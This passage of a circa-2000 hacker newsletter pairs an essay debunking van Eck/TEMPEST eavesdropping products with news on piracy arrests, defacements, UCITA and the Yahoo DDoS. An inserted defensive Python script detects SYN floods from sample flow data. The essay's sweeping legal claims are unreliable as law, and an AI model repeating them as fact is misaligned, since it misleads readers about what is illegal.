In 1985 Wim van Eck (an engineer in the Netherlands) published a white paper entitled "Electromagnetic Radiation from Video Display Units: An Eavesdropping Risk?" which discussed potential methods which could be used for eavesdropping on video monitors. The "van Eck receiver" was based on older video monitors which utilized a composite video signal with little or no RF/EMI shielding. These video signals were typical broadcast base-band video signals, and the monitors were generally un-shielded which radiated tremendous amounts of RF energy. Very often when these types of monitors were placed near a television set the video monitor would interfere with the television and the "computer stuff" would appear and interfere with the Dallas and Charlie's Angels re-runs. Since these monitors utilized the same timing signals and waveform parameters as commercial video signals the display of the signals was very easy and required only a few dollars in components to stabilize the signal.

RAID or Raster Analysis

Effectively what van Eck did was to point out a well-known hardware security vulnerability that existed in composite computer monitors. His paper covered methods that could be used to exploit this vulnerability, and brought "emission analysis" to public attention when it was published. Of course every "lid, kid, con-artist, crank, and crackpot" came forward and anointed him or herself an expert on van Eck and TEMPEST technology.

What Wim van Eck presented is actually called RAID or "Raster Analysis" which is the reconstruction of high bandwidth composite signals which are based on a repeating synchronization signal (such as Radar, Video, and so on).

A brief tutorial on raster or video signal analysis may be found at the following link
http://www.tscm.com/TSCM101video3.html

Lids, Kids, Con-Artists, Cranks, and Crackpots

It should be mentioned that the only place in the United States that a person can learn anything about TEMPEST is a special school taught and sanctioned by the National Security Agency. Once a technician or engineer completes the appropriate training the NSA will actually certify them as a "TEMPEST Technician" or "TEMPEST Engineer" and they will then be authorized to work on or design TEMPEST approved equipment. The (very expensive) courses are only offered to a limited number of people who have a very high level of security clearance, and who will be working with such equipment on a regular basis.

While van Eck's engineering and white paper were quite legitimate a number of con-artists capitalized on the paper to sell special screening boxes, "van Eck receivers", and special "Classified CIA intercept systems". These products are generally considered a rather old hoax, but the con artists are still raking in hundreds of thousands of dollars selling bogus toys. Such a system only requires about $15 to construct a special amplifier or timing circuit. The method is a "no-brainer" which any college freshman could do. Intercepting a composite video signal from an older unshielded monitor is actually quite simple, HOWEVER, the modern computer monitors sold today rarely use a composite video signal. Also, due to the serious shielding and emission standards required by the FCC the presence or interception of such signals is virtually nil (even at close distances).

Keep Your Wallet in Your Pocket

Many people, including the members of the media, have been swallowing what is falsely claimed to be TEMPEST simply because they neither understand the science nor will they do even simple research or inquiries on a vendor who claims to be a TEMPEST expert.

The majority of TEMPEST surveillance "demonstrations" are actually rigged or grossly misrepresented (the spy might as well become a psychic and start channeling Ramtha via his big toenail). In the past few years there have been quite a few "TEMPEST experts" that demonstrate what they claim will intercept "TEMPEST signals". Most of the Tempest/Van Eck surveillance products out there are nothing more than a scam run by thieves, con men, scam artists, liars, thieves, snake oil salesman, felons, and mental patients (no kidding). Seriously, if such a person attempts to peddle would-be TEMPEST products on you, ask about their current probation status, prior criminal convictions, and ask about the last time they talked with a psychiatrist or other mental health professional (and then watch them run out the door).

Several firms have even gone so far as to pre-record the display of a computer monitor (with a video camcorder no less) and then conceal a playback VCR in a fancy looking demonstration box. The victim pays the "TEMPEST expert" $20,000 for an identical box and never sees their money again, nor do they ever get a magical TEMPEST box. After several months the victim tries to contact the con artist only to find the phone number given goes to a beeper (the owner of which refuses to re-contact the victim).

The Law

Keep in mind that if somebody offers you any type of van Eck "intercept" or TEMPEST surveillance system that they are committing a serious federal felony. In the event that you are gullible enough to actually pay the con artist then YOU have committed a serious federal felony. Also, if you attempt in any way to obtain the equipment, or engage in any kind of activity to help someone else obtain the equipment that is also illegal (even if it's a hoax). You will leave eavesdropping and interception equipment alone unless you have a strong desire to have extended discussions with the nice agents from the FBI.
They would be quite happy to talk to you regarding your upcoming indictment and your "all expenses paid vacation at a federally operated vacation resort". Remember that ANY possession, attempted sale, attempted purchase, or building of such a surveillance product or device is highly illegal unless you are under a very specific government contract (even if it is a hoax).

The building, possession, sale, or advertising of any device designed or developed to exploit signal leakage or compromising emanations is a very serious criminal act in the United States unless you are under a very specific government contract (or are a police officer with a legitimate court order). Also, any device, or system which is primarily useful for the interception of communications is also illegal, and the justice system takes a very dim view of people who try to skirt the law by playing cute word games.

References

Here are a few of the more common government specifications (out of about 400) concerning TEMPEST and its associated disciplines:

(U) NSA-82-89, NACSIM 5000, TEMPEST Fundamentals, National Security Agency, February 1, 1982 (C)
(U) NACSIM 5004, Tempest Countermeasures for Facilities Within the United States, National COMSEC Instruction, January 1984 (S)
(U) NACSIM 5005, Tempest Countermeasures for Facilities Outside the United States, National COMSEC Instruction, NACSIM 5005, January 1985 (S)
(U) NACSIM 5009, Technical Rational: Basis for Electromagnetic Compromising Emanations Limits (C)
(U) NACSIM 5100A Compromising Emanations Laboratory Test Requirements, Electromagnetics. National Security Telecommunications and Information System Security (NSTISS)
(U) NACSIM 5108, Receiver and Amplifier Characteristics Measurement Procedures (FOUO)
(U) NACSIM 5109, TEMPEST Testing Fundamentals, March 1973
(U) NACSIM 5112, NONSTOP Evaluation Techniques
(U) NACSIM 5201, TEMPEST Guidelines for Equipment System Design, September 1978
(U) NSA 82-90, NACSIM 5203, Guidelines for Facility Design and RED/BLACK Installation, National Security Agency, June 30, 1982 (C)
(U) NSA 65-5, NACSIM 5204, RF Shielded Acoustical Enclosures for Communications Equipment: General Specification, National Security Agency, October 30, 1964 and May 1978 (C)
(U) NSA 65-6, NACSIM 5204, R.F. Shielded Enclosures for Communications Equipment: General Specification, National Security Agency, October 30, 1964
(U) NSA 73-2A, NACSIM 5204, National Security Agency Specification for Foil RF Shielded Enclosure, National Security Agency
NSA 89-01 (Draft), NACSIM 5204, National Security Agency Specification for a High Performance Shielded Enclosure, National Security Agency, May 31, 1989
(U) NCSC 3, TEMPEST Glossary (S)
(U) NTISSI 4002, Classification Guide for COMSEC Information (S)
NTISSI 7000, National Telecommunications and Information Systems Security Instruction, TEMPEST Countermeasures for Facilities, October 7, 1988
NTISSP 300, National Telecommunications and Information Systems Security Policy, National Policy on the Control of Compromising Emanations, October 3, 1988
NSTISSAM TEMPEST 1-92, Compromising Emanations Laboratory Test Requirements, Electromagnetics. National Security Telecommunications and Information System Security (NSTISS), December 15, 1992
NSTISSAM TEMPEST 1-93, Compromising Emanations Field Test Requirements Electromagnetics, August 30, 1993 (U)
(U) NSTISSAM TEMPEST 2-91, Compromising Emanations Analysis Handbook, National Security Telecommunications and Information Systems Security Advisory Memorandum (C)
NSTISSAM TEMPEST 2-92, Procedures for TEMPEST Zoning, December 30, 1992 (U)
NSTISSAM TEMPEST 2-95, RED/BLACK Installation Guidance, National Security Telecommunications and Information Systems Security Advisory Memorandum, December 12, 1995 (C)
NSTISSAM TEMPEST 3-91, Maintenance and Disposition of TEMPEST Equipment, December 20, 1991
INFOSEC System Security Products & Services Catalog, October 1990, National Security Agency
DOD Directive C-5000.19, Control of Compromising Emanations (U), February 23, 1990
MIL-STD-461E, Department of Defense Interface Standard, Requirements For The Control of Electromagnetic Interference Characteristics of Subsystems And Equipment (Replaces previous 461 and 462), 20 August 1999
MIL-STD-188-124B, Military Standard Grounding, Bonding and Shielding for Common Long Haul/Tactical Communication Systems including Ground Based Communications-Electronics Facilities and Equipment, February 1, 1992
MIL-HDBK-232, Red/Black Engineering - Installation Guidelines
MIL-HDBK-411A, Long Haul Communications (DCS), Power and Environmental Control for Physical Plant
MIL-HDBK-419, Grounding, Bonding, and Shielding for Electronic Equipment and Facilities
MIL-HDBK-1195, Radio Frequency Shielded Enclosures, September 30, 1988
MIL-STD-188-124, Grounding, Bonding, and Shielding for Common Long Haul and Tactical Communications Systems
MIL-STD-285, Method of Attenuation Measurement for Enclosures, Electromagnetic Shielding for Electronic Test Purposes.

James M. Atkinson
Granite Island Group
President and Sr. Engineer
http://www.tscm.com/
jmatk@tscm.com

About the Author

James M. Atkinson is one of a small number of people who have been formally certified and trained by the NSA as a TEMPEST Engineer, and Cryptographic Technician. He has extensive experience with the design and development of SIGINT systems to exploit and/or control compromising emanations. Additionally, he has many hours of experience working deep inside highly classified U.S. and NATO cryptographic, communications, and computer systems.

"If it doesn't involve a torque wrench, then it's not TEMPEST..."

@HWA

102.0 HNN: Feb 7th; Mitnick to Give Live Interview
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Macki

Kevin Mitnick, recently released after five years of imprisonment, will be the guest of this week's Off The Hook, Tuesday night at 8 pm EST. This is Mitnick's first live appearance since his release and the first time ever he will speak without being edited.

(Note: These shows are archived for downloading .. - Ed)

Off the Hook
http://www.2600.com/offthehook

@HWA

103.0 HNN: Feb 7th; Anti MPAA Leafletting Campaign a Huge Success
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Placebo Effekt

Friday's worldwide leafletting campaign to protest recent MPAA lawsuits against hundreds of web sites for distributing the DeCSS software was an undisputed success. People around the world passed out flyers to help spread the word. In New York people handed out more than 3000 flyers and London participants passed out flyers at such locations as the WB Movie Complex, and taped one to the window of the Disney Store and one to the window of the Warner Brothers Store.
2600.com
http://www.2600.com/

@HWA

104.0 HNN:Feb 7th:Founding Member of PWA Busted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(See also section 23.0 - Ed)

From HNN http://www.hackernews.com/

contributed by SmokEE

A founding member of Pirates With Attitudes, Robin Rothberg, 32, of Chelmsford, MA was arrested by the FBI last week. He has been charged with conspiracy in U.S. District Court in Boston. According to an FBI affidavit, the PWA is a highly structured organization and the investigation is ongoing. One of the conditions of his bail agreement is that Rothberg must let the FBI spot check his e-mail.

Boston Herald
http://www.bostonherald.com/bostonherald/lonw/comp02042000.htm

FBI nabs Chelmsford man in software piracy ring

by Andrea Estes
Friday, February 4, 2000

Federal officials say they've captured a leader of a worldwide band of e-pirates who surf the cyberseas in search of software plunder.

Robin Rothberg, 32, of Chelmsford, is a founding member of Pirates with Attitudes, an international crew that steals popular titles from powerful companies and gives them away to its members for free, the FBI says.

The group, snared by FBI agents in Chicago, is sophisticated and devious enough to have sought after software before it hits the shelves, authorities said. In December, FBI agents found Windows 2000 - which still hasn't been released - and Office 2000 premium, a program given to select customers for testing purposes. In all, agents found enough software to fill the memory of 1,200 average-sized personal computer hard drives.

Rothberg, who until last week was a notebook software engineer for NEC Computer Services in Acton, was arrested yesterday and charged with conspiracy in U.S. District Court in Boston. Wearing a long ponytail and black leather jacket, he pleaded not guilty and was released without bail.

According to an FBI affidavit, Pirates with Attitudes is a highly structured organization with different members assigned different tasks. ``Suppliers'' steal the programs from major software companies. ``Couriers'' deliver the files to PWA and ``crackers'' strip away the security codes that prevent piracy.

The group, overseen by a council, screens members to ``minimize the risk of detection by authorities,'' according to an affidavit filed by FBI Special Agent Michael Snyder of Chicago.

Rothberg, who is alleged to be a member of the council, was arrested after an informant helped steer Snyder, an MBA and computer expert, through its maze-like system.

Agents located PWA's internet site, ``Sentinel,'' which is accessible only to authorized users.

``Members maintain access to PWA's site by providing files, including copyrighted software files obtained from other sources, and in turn are permitted to copy files provided by other users,'' wrote Snyder.

``Using the confidential informant's access codes, FBI agents logged onto Sentinel and viewed a directory listing thousands of copyrighted software titles available for downloading by PWA members,'' he wrote.

So far only Rothberg has been arrested. Chicago authorities yesterday said the investigation is continuing.

``In the simplest terms, it's an organization that allowed its members to upload software to a site configured so it could store a substantial amount of software,'' said assistant United States Attorney Lisa Griffin. ``They could then download it into their own computers.''

Members give and take what they wish, officials said. ``It's a two-way street,'' said Randy Sanborn, spokesman for the United States Attorney's Office in the Northern District of Illinois.

Officials wouldn't say whether members have to pay anything - such as a membership fee - for the service.

Rothberg was downsized out of his job last week when the division he worked for ceased to exist, according to an NEC spokeswoman, who said the company has no plans to investigate Rothberg's job performance.

Rothberg asked Magistrate Judge Robert Collings for permission to travel to California today for a job interview. And Rothberg said he had several more planned, his attorney Joseph Savage told Collings. Collings ordered him to stay off his computer except to look for a job, let the FBI spot check his e-mail, and get the court's permission if he wants to travel outside the Bay State.

@HWA

105.0 HNN: Feb 7th; Teenager Busted for Attempted Cyber Extortion of $500
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

After attempting to extort a man for $500 a Toronto teenager has been sentenced to 100 hours of community service, and two years probation. He will also have to tell police how he managed to break into the man's computer to issue the extortion demand. The teenager was caught after he went to pick up the money left in a bag on a street corner near his home. Police also found counterfeit five and twenty dollar bills in the teenager's home. He has pleaded guilty to extortion, mischief, unauthorized use of a computer, fraudulent possession of a password, possession of counterfeit money and possession of instruments for counterfeiting.

The Toronto Star
http://www.thestar.com/back_issues/ED20000204/toronto/20000204NEW04b_CI-HACKER.html

(Poor sod thought small, a measly $500, and went and got busted, makes ya sick dunnit? - Ed)

Hacker, 14, tried to extort $500, court told
Teen demanded payoff from businessman

By Nick Pron
Toronto Star Staff Reporter

A 14-year-old boy who tried to extort $500 from a businessman after hacking into his computer will have to explain to police how he did it as part of his punishment.

The teenager, who can't be identified under the Young Offenders Act, demanded the payoff be put in a red bag and left at the end of his street, just north of Toronto, a family court sentencing hearing was told yesterday.
But the Toronto businessman, who also can't be identified under a court order, went to the police, and undercover officers secretly watched the teenager pick up the cash and take it home, the hearing was told.

When officers searched his home, they found the teen had also been making counterfeit $5 and $20 bills.

As well as explaining to police how he hacked into the businessman's computer, the teen must do 100 hours of community service and serve two years probation.

Crown Attorney Calvin Barry said since the Grade 9 student was so good with computers he would likely do his community work teaching basic computer skills.

The teen pleaded guilty to extortion, mischief, unauthorized use of a computer, fraudulent possession of a password, possession of counterfeit money and possession of instruments for counterfeiting.

Barry told the court the west-end businessman, who runs a computer store, used an Internet chat line to communicate with his customers. Someone hacked into his chat line account and changed the password, rendering his own secret code word useless.

The businessman was able to trace through the Internet the person who hacked into his account. When he E-mailed the teen, he was told he had to pay $500 for the new password, the court heard.

@HWA

106.0 HNN: Feb 7th; Japanese Plan to Fight Cyber Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

The National Police Agency of Japan has requested $1.78 million from the country's fiscal 2000 budget to study electronic break-ins. The agency's records indicate that there were 247 Internet crimes, including distributing child pornography, in Japan in 1999. This follows several high profile defacements of government web sites in recent weeks.
Associated Press - via Tampa Bay Online
http://ap.tbo.com/ap/breaking/MGIGU35UA4C.html

Reports: Japanese Police Moving to Counter Wave of Internet Crime

The Associated Press

TOKYO (AP) - With hackers barraging government Internet sites, Japanese police announced plans to improve crime-fighting in cyberspace, newspapers reported Saturday.

Beginning late last month, unidentified hackers began a high-profile campaign to crack state sites. And despite its love for just about everything high-tech, Japan is far behind other countries when it comes to tackling online crime.

The Yomiuri Shimbun, Japan's largest paper, said the National Police Agency has requested $1.78 million from the country's fiscal 2000 budget to battle the problem. Police want to study how hackers break into Web sites and ensure user names are not being abused, the reports said. Agency officials were unavailable for comment.

Agency figures showed that 247 Internet crimes, including distributing child pornography, were reported in 1999, nearly double the previous year, according to major Japanese newspapers.

A bill aimed at improving user verification, a so-called digital signature bill, is due to be submitted to parliament soon, the Asahi Shimbun reported. Digital signatures allow people to use the Internet to buy and sell goods and services, it said. The police agency is urging that mandatory identity checks on people who apply for such signatures be made part of the bill, the paper said.

The proposed legislation comes on the heels of a new law parliament passed last summer to make it illegal to access sites without the proper clearance. It takes effect this month.

The Bank of Japan - the country's central bank - the Defense Agency, the Science and Technology Agency and the Transport Ministry have all reported being attacked by hackers, though they reported no damage.
However, hackers into the Science and Technology Agency's homepage left a message alleging that Tokyo denied the Rape of Nanking, the Japanese army's massacre of as many as 300,000 civilians during the 1937-38 occupation of the Chinese city now known as Nanjing.

@HWA

107.0 HNN: Feb 7th; Philippine President Web Site Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

The web site of Philippine President Joseph Estrada was defaced last week. The site had one page altered with comments containing sexual innuendoes. Officials said that security practices for the site would be reviewed.

Business Today
http://www.BusinessToday.com/techpages/erap02042000.htm

Technology Today
Philippine president's Erap.com Web site vandalized by hacker

Bloomberg
Friday, February 4, 2000

A computer hacker broke into the Internet site of President Joseph Estrada, inserting a sexual innuendo on an electronic document in the first successful vandalism of the Philippine leader's Web presence.

The prankster placed the phrase, including a mention of homosexuality, on a week-old briefing paper on oil prices that was posted by the Office of the Press Secretary to the www.erap.com site. The posting was on the web site for almost a day before being removed.

``If I was older, I'd have a heart attack,'' said Ding Gagelonia, director of the Bureau of Broadcast Services, which oversees the site.

The intrusion comes a week after two Japanese ministries had their Web sites defaced, and highlights the potential embarrassment awaiting vulnerable computers of the government and private companies as more firms in Asia conduct their businesses over the Internet. In the Japanese break-ins, the hackers erased data and placed links to pornography sites.

Gagelonia said it was the first time the site, established in June 1998 to promote the policies of Estrada and obtain feedback from the public, had its contents altered.
Previously, the site was the target of ``mail-bomb'' attacks where pranksters tried to shut it down by overloading its e-mail system. Those attacks were repulsed, he said.

The site, which has a computer server in the presidential palace and another one in Europe, will review its security procedures, Gagelonia said. DesignNet Philippines Inc., a unit of the Engstrom Group of Sweden, developed the site.

@HWA

108.0 HNN: Feb 8th; Software Companies Seek to Alter Contract Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

The Uniform Computer Information Transactions Act (UCITA) is still being pushed by powerful software companies through state legislatures across the nation. UCITA legislation would give software companies the ability to 'turn off' software remotely, it would provide for license agreements that could be changed with only an email notice, and it would ban critical software reviews through stronger license agreements. The software industry is aggressively lobbying for this legislation, saying that it is an overdue modernization of contract law to keep up with the pace of electronic commerce. It is expected that several states will actually pass this draconian law.

LA Times
http://www.latimes.com/news/front/20000204/t000011344.html

Richard Stallman has written some interesting comments on UCITA, why it is bad, and why it should be defeated in every state.

Open Letter From Richard Stallman
http://www.hackernews.com/special/2000/utica.html

For more information on UCITA see also:

4cite
http://www.4cite.org

Bad Software
http://www.badsoftware.com

LA Times; (Sorry, story unavailable or in pay per view archives - Ed)

Richard Stallman's letter

Date: Mon, 31 Jan 2000 13:34:25 -0700 (MST)
From: Richard Stallman gnu@gnu.org
To: info-gnu@gnu.org
Subject: Why We Must Fight UCITA

[Please redistribute this widely wherever it is appropriate.]

Why We Must Fight UCITA
by Richard Stallman

UCITA is a proposed law, designed by the proprietary software developers, who are now asking all 50 states of the US to adopt it. If UCITA is adopted, it will threaten the free software community(1) with disaster. To understand why, please read on.

We generally believe that big companies ought to be held to a strict standard of liability to their customers, because they can afford it and because it will keep them honest. On the other hand, individuals, amateurs, and good samaritans should be treated more favorably.

UCITA does exactly the opposite. It makes individuals, amateurs, and good samaritans liable, but not big companies.

You see, UCITA says that by default a software developer or distributor is completely liable for flaws in a program; but it also allows a shrink-wrap license to override the default. Sophisticated software companies that make proprietary software will use shrink-wrap licenses to avoid liability entirely. But amateurs, and self-employed contractors who develop software for others, will often be shafted because they didn't know about this problem. And we free software developers won't have any reliable way to avoid the problem.

What could we do about this? We could try to change our licenses to avoid it. But since we don't use shrink-wrap licenses, we cannot override the UCITA default. Perhaps we can prohibit distribution in the states that adopt UCITA. That might solve the problem--for the software we release in the future. But we can't do this retroactively for software we have already released. Those versions are already available, people are already licensed to distribute them in these states--and when they do so, under UCITA, they would make us liable.
We are powerless to change this situation by changing our licenses now; we will have to make complex legal arguments that may or may not work.

UCITA has another indirect consequence that would hamstring free software development in the long term--it gives proprietary software developers the power to prohibit reverse engineering. This would make it easy for them to establish secret file formats and protocols, which there would be no lawful way for us to figure out.

That could be a disastrous obstacle for development of free software that can serve users' practical needs, because communicating with users of non-free software is one of those needs. Many users today feel that they must run Windows, simply so they can read and write files in Word format. Microsoft's "Halloween documents" announced a plan to use secret formats and protocols as a weapon to obstruct the development of the GNU/Linux system(2).

Precisely this kind of restriction is now being used in Norway to prosecute 16-year-old Jon Johansen, who figured out the format of DVDs to make it possible to write free software to play them on free operating systems. (The Electronic Frontier Foundation is helping with his defense; see http://www.eff.org/ for further information.)

Some friends of free software have argued that UCITA would benefit our community, by making non-free software intolerably restrictive, and thus driving users to us. Realistically speaking, this is unlikely, because it assumes that proprietary software developers will act against their own interests. They may be greedy and ruthless, but they are not stupid.

Proprietary software developers intend to use the additional power UCITA would give them to increase their profits. Rather than using this power at full throttle all the time, they will make an effort to find the most profitable way to use it. Those applications of UCITA power that make users stop buying will be abandoned; those that most users tolerate will become the norm.
UCITA will not help us.

UCITA does not apply only to software. It applies to any sort of computer-readable information. Even if you use only free software, you are likely to read articles on your computer, and access data bases. UCITA will allow the publishers to impose the most outrageous restrictions on you. They could change the license retroactively at any time, and force you to delete the material if you don't accept the change. They could even prohibit you from describing what you see as flaws in the material.

This is too outrageous an injustice to wish on anyone, even if it would indirectly benefit a good cause. As ethical beings, we must not favor the infliction of hardship and injustice on others on the grounds that it will drive them to join our cause. We must not be Machiavellian. The point of free software is concern for each other.

Our only smart plan, our only ethical plan, is...to defeat UCITA!

If you want to help the fight against UCITA, by meeting with state legislators in your state, send mail to Skip Lockwood dfc@dfc.org. He can tell you how to contribute effectively.

Volunteers are needed most urgently in Virginia and Maryland, but California and Oklahoma are coming soon. There will probably be a battle in every state sooner or later.

For more information about UCITA, see www.4cite.org and www.badsoftware.com. InfoWorld magazine is also helping to fight against UCITA; see http://archive.infoworld.com/cgi-bin/displayStory.pl?/features/990531ucita_home.htm

Copyright 2000 Richard Stallman
Verbatim copying, distribution and display of this entire article are permitted in any medium provided this notice is preserved.

(1) Other people have been using the term "open source" to describe a similar category of software. I use the term "free software" to show that the Free Software Movement still exists--that the Open Source Movement has not replaced or absorbed us.
If you value your freedom as well as your convenience, I suggest you use the term "free software", not "open source", to describe your own work, so as to stand up clearly for your values.

If you value accuracy, please use the term "free software", not "open source", to describe the work of the Free Software Movement. The GNU operating system, its GNU/Linux variant, the many GNU software packages, and the GNU GPL, are all primarily the work of the Free Software Movement. The supporters of the Open Source Movement have the right to promote their views, but they should not do so on the basis of our achievements.

See http://www.gnu.org/philosophy/free-software-for-freedom.html for more explanation.

(2) The system is often called "Linux", but properly speaking Linux is actually the kernel, one major component of the system (see http://www.gnu.org/gnu/linux-and-gnu.html).

(3) Mozilla is free software; Netscape Navigator is not. The source for Netscape Navigator 4.0 is not available.

(4) Sun's implementation of Java, and Blackdown which is a port of that, are not free software. Source code is unavailable for some parts; even where source has been released, the licenses are far too restrictive.

@HWA

109.0 HNN: Feb 8th; Yahoo Taken Offline After Suspected DoS Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

First of several distributed mass DoS attacks on high profile sites .... - Ed

From HNN http://www.hackernews.com/

contributed by Brian

All of Yahoo.com was unreachable for several hours yesterday after what company officials claimed was a massive denial of service attack. While officials stress that there were no successful intrusions there still seems to be some confusion over what exactly happened. Some reports seem to indicate a bandwidth consumption attack with either Trinoo or TFN (Tribe Flood Network) while other reports say that individual routers were pushed over, and Wired says that it may have been due to 'misconfigured equipment'.
(I hope this is straightened out soon so that the rest of us can protect ourselves.)

NY Times
http://www.nytimes.com/aponline/w/AP-Yahoo.html

Associated Press - via Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500164907-500208998-500963784-0,00.html

MSNBC
http://www.msnbc.com/news/367156.asp

Industry Standard - via Yahoo
http://dailynews.yahoo.com/h/is/20000207/bs/20000207130.html

Wired
http://www.wired.com/news/business/0,1367,34178,00.html

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_635000/635048.stm

AP/Nando;

Hackers attack, overwhelm Yahoo!

Copyright © 2000 Nando Media
Copyright © 2000 Associated Press

By TED BRIDIS

WASHINGTON (February 7, 2000 8:36 p.m. EST http://www.nandotimes.com) - Computer vandals using a common electronic attack overwhelmed Yahoo!, the most popular site on the Internet, and rendered the flagship Web directory inaccessible for much of Monday.

Yahoo! Inc. spokeswoman Diane Hunt said the company, worth roughly $93 billion, was the victim of hackers flooding its equipment with repeated electronic requests. The vandals did not gain access inside its computers, she said.

The technique, called a denial of service attack, is similar to pranksters repeatedly dialing a company's telephone number to block all other incoming calls.

Hunt said technicians determined that a flood of data requests coming from different computers on the Internet had overwhelmed its routers, which help direct traffic for the Web site. Technicians ultimately were able to identify the type of data and filter it out, which restored service.

She said she was unaware whether the company had contacted the FBI, which coincidentally warned Web sites last month about a specific type of denial of service attack.

"Our first priority has been identifying what was happening and then installing the filters to enable our users to access our services," Hunt said.
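What Hunt describes, identifying the flood and then building a filter for it, is the job of whoever is watching the router's flow export when the phones start ringing. The block below is an example added here by the editor, not Yahoo's, Global Center's or HNN's code: it buckets flow records per destination and time window, flags a bucket whose packet rate and source count both blow past a threshold, and summarises what the offending flows have in common (SYN-only, spoofed private-range sources, one port) so an ACL or rate-limit can be written from the summary. The records, the addresses, the traffic mix and the thresholds are all constructed for the illustration; real input would come from a NetFlow or sFlow collector.

```python
"""Flood detection over constructed flow records.

Added example, not Yahoo's, Global Center's or HNN's code.  The records
mimic the fields a router or NetFlow collector exports; the addresses,
the traffic mix and the thresholds are assumptions made for illustration."""
from collections import Counter, defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Flow:
    ts: float       # start time in seconds
    src: str        # source IPv4 address as text
    dst: str        # destination IPv4 address as text
    proto: str      # "tcp", "udp" or "icmp"
    dport: int      # destination port (0 for icmp)
    packets: int
    bytes: int
    flags: str      # TCP flags observed, e.g. "S", "SPA"; "" when not TCP


# Address ranges that must never appear as a source on an Internet-facing
# link; their presence in a flood is a strong sign the sources are spoofed.
BOGON = [ip_network(n) for n in ("0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8",
                                 "172.16.0.0/12", "192.168.0.0/16")]


def sample_flows():
    """Constructed sample: three ordinary flows, then 300 single-packet SYNs
    from 300 distinct sources against 10.0.0.10:80 inside one second.  A
    third of the flood sources sit in 10.0.0.0/8, i.e. are spoofed."""
    flows = [
        Flow(0.1, "192.0.2.11", "10.0.0.10", "tcp", 80, 12, 9800, "SPA"),
        Flow(0.4, "198.51.100.7", "10.0.0.10", "tcp", 80, 9, 7100, "SPA"),
        Flow(0.9, "203.0.113.5", "10.0.0.20", "tcp", 25, 20, 15000, "SPA"),
    ]
    for i in range(300):
        first = 10 if i % 3 == 0 else 20 + i % 7
        src = f"{first}.{i % 256}.{i // 256}.{i % 251 + 1}"
        flows.append(Flow(i / 300, src, "10.0.0.10", "tcp", 80, 1, 40, "S"))
    return flows


def analyse(flows, window=1.0, pps_threshold=200, min_sources=50):
    """Bucket flows per (destination, time window).  A bucket is reported
    when its packet rate and its number of distinct sources both exceed the
    thresholds; the report summarises what the traffic has in common so
    that a filter can be written from it."""
    buckets = defaultdict(list)
    for f in flows:
        buckets[(f.dst, int(f.ts // window))].append(f)
    alerts = []
    for (dst, w), fl in sorted(buckets.items()):
        pps = sum(f.packets for f in fl) / window
        sources = {f.src for f in fl}
        if pps < pps_threshold or len(sources) < min_sources:
            continue
        syn_only = sum(1 for f in fl
                       if f.proto == "tcp" and f.flags == "S" and f.packets == 1)
        bogon = sum(1 for f in fl
                    if any(ip_address(f.src) in net for net in BOGON))
        port, hits = Counter(f.dport for f in fl).most_common(1)[0]
        alerts.append({
            "dst": dst, "window": w, "pps": pps, "sources": len(sources),
            "syn_only_fraction": syn_only / len(fl),
            "bogon_source_fraction": bogon / len(fl),
            "top_port": port, "top_port_fraction": hits / len(fl),
        })
    return alerts


def suggest_filters(alert):
    """Turn one alert into filter candidates, most specific first: drop what
    cannot be legitimate (spoofed bogon sources), then rate-limit the
    signature the flood shares, and only as a last resort throttle all
    traffic to the target."""
    rules = []
    if alert["bogon_source_fraction"] > 0.2:
        rules.append(f"drop ingress packets to {alert['dst']} "
                     "whose source is in a bogon or private range")
    if alert["syn_only_fraction"] > 0.8:
        rules.append(f"rate-limit TCP SYN to {alert['dst']}:{alert['top_port']} "
                     "and enable SYN cookies on the host")
    if not rules:
        rules.append(f"rate-limit all traffic to {alert['dst']} and ask the "
                     "upstream provider for source-based filtering")
    return rules


if __name__ == "__main__":
    for a in analyse(sample_flows()):
        print(f"{a['dst']} window {a['window']}: {a['pps']:.0f} pps from "
              f"{a['sources']} sources, {a['syn_only_fraction']:.0%} SYN-only, "
              f"{a['bogon_source_fraction']:.0%} bogon sources")
        for r in suggest_filters(a):
            print("  ->", r)
```

The point of the summary step is the one the Wired piece below turns on: a flood and a dying line card look the same from the outside (traffic stops), but only the flood has hundreds of sources, a single shared packet signature and addresses that should never arrive from the Internet. Filtering bogon sources and rate-limiting the shared signature leaves real clients alone; a blanket rate-limit on the target is the fallback when the flood has no signature to key on.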
In its advisory, the FBI's National Infrastructure Protection Center said it was "highly concerned about the scale and significance of these reports" and said vulnerabilities were "widespread, well-known and readily accessible on most networked systems."

-=-

Industry Standard;

Monday February 07 09:16 PM EST

Yahoo Unplugged by Hackers
Elinor Abreu, The Industry Standard

Yahoo did not have a good day. A hacker attack rendered the Web's No. 1 portal intermittently inaccessible Monday.

Starting at about 10:30 a.m. PST, a coordinated, multi-point attack on Yahoo's California data center shut down the site sporadically, a Yahoo representative said.

The so-called "distributed denial of service attack" works by bombarding servers with so much fake traffic that genuine traffic cannot get through. Redundant servers allowed some visitors access to the site.

The company installed filters on its routers around 1:30 p.m. to block fake traffic and open up bandwidth to legitimate users, the representative said. No user information was compromised and some Yahoo services, like Web-based e-mail and its virtual shopping mall, were believed to have been unaffected. The main site was inaccessible by some as late as 4:45 p.m.

